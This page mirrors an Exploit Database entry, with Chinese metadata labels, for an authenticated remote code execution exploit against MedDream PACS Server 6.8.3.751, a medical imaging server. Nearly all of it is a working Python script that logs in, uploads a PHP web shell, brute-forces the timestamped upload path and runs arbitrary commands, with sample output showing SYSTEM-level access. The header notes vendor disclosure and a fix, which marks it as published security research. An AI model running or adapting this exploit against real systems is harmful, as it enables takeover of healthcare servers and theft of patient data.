MedDream PACS Server 6.8.3.751 – Remote Code Execution (Authenticated)

• Exploit Database
• 19 阅读

• 作者： bzyo
  日期： 2020-10-02
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48853/

• #!/usr/bin/python
  #
  #
  # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
  # Exploit Author: bzyo
  # Twitter: @bzyo_
  # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated)
  # Date: 2020-10-01
  # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/
  # Vendor Homepage: https://www.softneta.com
  # Version: 6.8.3.751
  # Tested On: Windows 2016
  #
  #
  # Timeline
  # 05-02-20: Submitted incident through email, immediate response
  # 05-04-20: Issue resolved, New version released 6.8.3.1.751
  # 
  # Note: Core Vulnerability resides in another product which has been remediated as well
  #
  ##PoC##
  #
  # 1. create one line php shell to call commands
  # 2. run script on attacking machine
  # 3. enter parameters; IP, filename, username, password, command
  # 
  #
  # root@kali:~# python meddream.py 
  # Enter IP Address: 192.168.0.223
  # Enter payload filename + .php: cmd.php
  # Enter Username: user1
  # Enter Password: SoSecure!!
  # Enter command: whoami
  # 212357
  # <pre>nt authority\system
  # </pre>
  # http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami
  # 404
  # 404
  # 404
  # 404
  # 404
  # 404
  # 404
  # 404
  # 404
  #
  #
  
  from urllib2 import urlopen
  from bs4 import BeautifulSoup
  import requests
  import sys
  import time
  from datetime import datetime, timedelta
  
  ip_addr = raw_input("Enter IP Address: ")
  user_file = raw_input("Enter payload filename + .php: ")
  uname = raw_input("Enter Username: ")
  pword = raw_input("Enter Password: ")
  cmd = raw_input("Enter command: ")
  
  URL1= 'http://' + ip_addr + '/Pacs/login.php'
  URL2= 'http://' + ip_addr + '/Pacs/authenticate.php'
  URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php'
  
  def main():
  session = requests.Session() 
  
  site = session.get(URL1)
  
  soup = BeautifulSoup(site.content, "html.parser")
  antispam = soup.find("input", {"name":"formAntiSpam"})["value"]
  dbname = soup.find("input", {"name":"aetitle"})["value"]
  login_data = {
  'loginvalue': 'login',
  'aetitle': dbname,
  'username': uname,
  'password': pword,
  'formAntispam': antispam,
  'login': 'Login',
  }
  
  r = session.post(URL2, data = login_data)
   
  
  files = [
  ('actionvalue', (None, 'Attach', None)),
  ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')),
  ('action', (None, 'Attach', None)),
  ]
  
  r = session.post(URL3, files=files)
  
  today = datetime.today()
  upload_date = today.strftime("%Y%m%d")
  
  less = 1
  now1 = datetime.now()
  up_time1 = now1.strftime("%H%M%S")
  print(up_time1)
  #varying time checks +/-
  now2 = now1 - timedelta(seconds=less)
  up_time2 = now2.strftime("%H%M%S")
  now3 = now2 - timedelta(seconds=less)
  up_time3 = now3.strftime("%H%M%S")
  now4 = now3 - timedelta(seconds=less)
  up_time4 = now4.strftime("%H%M%S")
  now5 = now4 - timedelta(seconds=less)
  up_time5 = now5.strftime("%H%M%S")
  now6 = now5 - timedelta(seconds=less)
  up_time6 = now6.strftime("%H%M%S")
  now7 = now6 - timedelta(seconds=less)
  up_time7 = now7.strftime("%H%M%S")
  now8 = now1 + timedelta(seconds=less)
  up_time8 = now8.strftime("%H%M%S")
  now9 = now8 + timedelta(seconds=less)
  up_time9 = now8.strftime("%H%M%S")
  now10 = now1 + timedelta(seconds=less)
  up_time10 = now9.strftime("%H%M%S")
  
  
  up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10]
  for i in up_time_array: 
  r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd)
  if r.status_code == 200: 
  print r.content
  print r.url
  else:
  print ("404")
  
  if __name__ == '__main__':
  main()